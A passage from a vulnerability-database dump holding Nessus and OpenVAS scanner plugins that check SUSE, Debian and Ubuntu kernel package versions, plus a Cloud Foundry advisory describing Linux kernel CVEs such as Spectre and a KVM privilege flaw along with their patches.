code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn't properly validate\n the sigevent->sigev_notify field, which lead to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allowed userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE) (bsc#1103203). before 4.14.8\n\n - CVE-2017-11600: net/xfrm/xfrm_policy.c did not ensure\n that the dir value of xfrm_userpolicy_id is\n XFRM_POLICY_MAX or less, which allowed local users to\n cause a denial of service (out-of-bounds access) or\n possibly have unspecified other impact via an\n XFRM_MSG_MIGRATE xfrm Netlink message (bsc#1096564)\n\n - CVE-2018-10853: A flaw was found in kvm. In which\n certain instructions such as sgdt/sidt call\n segmented_write_std didn't propagate access correctly.\n As such, during userspace induced exception, the guest\n can incorrectly assume that the exception happened in\n the kernel and panic. (bsc#1097108).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097108\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099306\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11600/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18344/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10853/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3646/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182387-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ba52771\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1651=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1651=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_74-92_38-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_74-92_38-default-11-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:18:48", "bulletinFamily": "scanner", "description": "The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Spectre variant 2\n(branch target injection) and is mitigated for the x86\narchitecture (amd64 and i386) by using new microcoded\nfeatures.\n\nThis mitigation requires an update to the processor", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-1422.NASL", "href": "https://www.tenable.com/plugins/nessus/111082", "published": "2018-07-16T00:00:00", "title": "Debian DLA-1422-2 : linux security update (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1422-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111082);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2018-1000204\", \"CVE-2018-1066\", \"CVE-2018-10853\", \"CVE-2018-1093\", \"CVE-2018-10940\", \"CVE-2018-1130\", \"CVE-2018-11506\", \"CVE-2018-12233\", \"CVE-2018-3665\", \"CVE-2018-5814\", \"CVE-2018-9422\");\n\n script_name(english:\"Debian DLA-1422-2 : linux security update (Spectre)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Spectre variant 2\n(branch target injection) and is mitigated for the x86\narchitecture (amd64 and i386) by using new microcoded\nfeatures.\n\nThis mitigation requires an update to the processor's\nmicrocode, which is non-free. For recent Intel processors,\nthis is included in the intel-microcode package from version\n3.20180425.1~deb8u1. For other processors, it may be\nincluded in an update to the system BIOS or UEFI firmware,\nor in a later update to the amd64-microcode package.\n\nThis vulnerability was already mitigated for the x86\narchitecture by the 'retpoline' feature.\n\nCVE-2017-5753\n\nFurther instances of code that was vulnerable to Spectre variant 1\n(bounds-check bypass) have been mitigated.\n\nCVE-2018-1066\n\nDan Aloni reported to Red Hat that the CIFS client implementation\nwould dereference a NULL pointer if the server sent an invalid\nresponse during NTLMSSP setup negotiation. This could be used by a\nmalicious server for denial of service.\n\nThe previously applied mitigation for this issue was not\nappropriate for Linux 3.16 and has been replaced by an\nalternate fix.\n\nCVE-2018-1093\n\nWen Xu reported that a crafted ext4 filesystem image could trigger an\nout-of-bounds read in the ext4_valid_block_bitmap() function. A local\nuser able to mount arbitrary filesystems could use this for denial of\nservice.\n\nCVE-2018-1130\n\nThe syzbot software found that the DCCP implementation of sendmsg()\ndoes not check the socket state, potentially leading to a NULL pointer\ndereference. A local user could use this to cause a denial of service\n(crash). \n\nCVE-2018-3665\n\nMultiple researchers have discovered that some Intel x86 processors\ncan speculatively read floating-point and vector registers even when\naccess to those registers is disabled. The Linux kernel's 'lazy FPU'\nfeature relies on that access control to avoid saving and restoring\nthose registers for tasks that do not use them, and was enabled by\ndefault on x86 processors that do not support the XSAVEOPT\ninstruction.\n\nIf 'lazy FPU' is enabled on one of the affected processors,\nan attacker controlling an unprivileged process may be able\nto read sensitive information from other users' processes or\nthe kernel. This specifically affects processors based on\nthe 'Nehalem' and 'Westemere' core designs. This issue has\nbeen mitigated by disabling 'lazy FPU' by default on all x86\nprocessors that support the FXSAVE and FXRSTOR instructions,\nwhich includes all processors known to be affected and most\nprocessors that perform speculative execution. It can also\nbe mitigated by adding the kernel parameter: eagerfpu=on\n\nCVE-2018-5814\n\nJakub Jirasek reported race conditions in the USB/IP host driver. A\nmalicious client could use this to cause a denial of service (crash or\nmemory corruption), and possibly to execute code, on a USB/IP server.\n\nCVE-2018-9422\n\nIt was reported that the futex() system call could be used by an\nunprivileged user for privilege escalation.\n\nCVE-2018-10853\n\nAndy Lutomirski and Mika Penttilä reported that KVM for x86\nprocessors did not perform a necessary privilege check when emulating\ncertain instructions. This could be used by an unprivileged user in a\nguest VM to escalate their privileges within the guest.\n\nCVE-2018-10940\n\nDan Carpenter reported that the optical disc driver (cdrom) does not\ncorrectly validate the parameter to the CDROM_MEDIA_CHANGED ioctl. A\nuser with access to a cdrom device could use this to cause a denial of\nservice (crash).\n\nCVE-2018-11506\n\nPiotr Gabriel Kosinski and Daniel Shapira reported that the SCSI\noptical disc driver (sr) did not allocate a sufficiently large buffer\nfor sense data. A user with access to a SCSI optical disc device that\ncan produce more than 64 bytes of sense data could use this to cause a\ndenial of service (crash or memory corruption), and possibly for\nprivilege escalation.\n\nCVE-2018-12233\n\nShankara Pailoor reported that a crafted JFS filesystem image could\ntrigger a denial of service (memory corruption). This could possibly\nalso be used for privilege escalation.\n\nCVE-2018-1000204\n\nThe syzbot software found that the SCSI generic driver (sg) would in\nsome circumstances allow reading data from uninitialised buffers,\nwhich could include sensitive information from the kernel or other\ntasks. However, only privileged users with the CAP_SYS_ADMIN or\nCAP_SYS_RAWIO capability were allowed to do this, so this has little\nor no security impact.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.16.57-1. This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-arm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-586\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armhf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-ixp4xx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-kirkwood\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-orion5x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-586\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-ixp4xx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-kirkwood\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-orion5x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-3.16.0-9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-x86\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-586\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-686-pae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-amd64\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armel\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armhf\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-i386\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-amd64\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp-lpae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-common\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-ixp4xx\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-kirkwood\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-orion5x\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-versatile\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-586\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae-dbg\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64-dbg\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp-lpae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-ixp4xx\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-kirkwood\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-orion5x\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-versatile\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-9\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-9-amd64\", reference:\"3.16.57-2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:50", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 16.04\n\n# Description\n\nUSN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly handle sequence number overflows, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux kernel did not properly handle some indirect calls, reducing the effectiveness of Spectre v2 mitigations for paravirtual guests. A local attacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and prediction of return addresses via Return Stack Buffer (RSB) may allow unauthorized memory reads via sidechannel attacks. An attacker could use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil\u00e4 discovered that the KVM implementation in the Linux kernel did not properly check privilege levels when emulating some instructions. An unprivileged attacker in a guest VM could use this to escalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI target implementation of the Linux kernel. A remote attacker could use this to cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-6555)\n\nCVEs contained in this USN include: CVE-2018-10853, CVE-2018-14633, CVE-2018-15572, CVE-2018-15594, CVE-2018-17182, CVE-2018-6554, CVE-2018-6555\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 97.x versions prior to 97.19\n * All other stemcells not listed.\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 97.x versions to 97.19\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n\n# References\n\n * [USN-3777-2](<https://usn.ubuntu.com/3777-2>)\n * [CVE-2018-10853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10853>)\n * [CVE-2018-14633](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14633>)\n * [CVE-2018-15572](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15572>)\n * [CVE-2018-15594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15594>)\n * [CVE-2018-17182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17182>)\n * [CVE-2018-6554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6554>)\n * [CVE-2018-6555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6555>)\n", "modified": "2018-10-09T00:00:00", "published": "2018-10-09T00:00:00", "id": "CFOUNDRY:2AA1F360A02E665F9D2B19AB7EF0CAA9", "href": "https://www.cloudfoundry.org/blog/usn-3777-2/", "title": "USN-3777-2: Linux kernel (HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-02T00:00:00", "id": "OPENVAS:1361412562310843647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843647", "title": "Ubuntu Update for linux USN-3777-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3777_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux USN-3777-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843647\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-02 08:12:15 +0200 (Tue, 02 Oct 2018)\");\n script_cve_id(\"CVE-2018-17182\", \"CVE-2018-15594\", \"CVE-2018-15572\", \"CVE-2018-10853\",\n \"CVE-2018-14633\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", 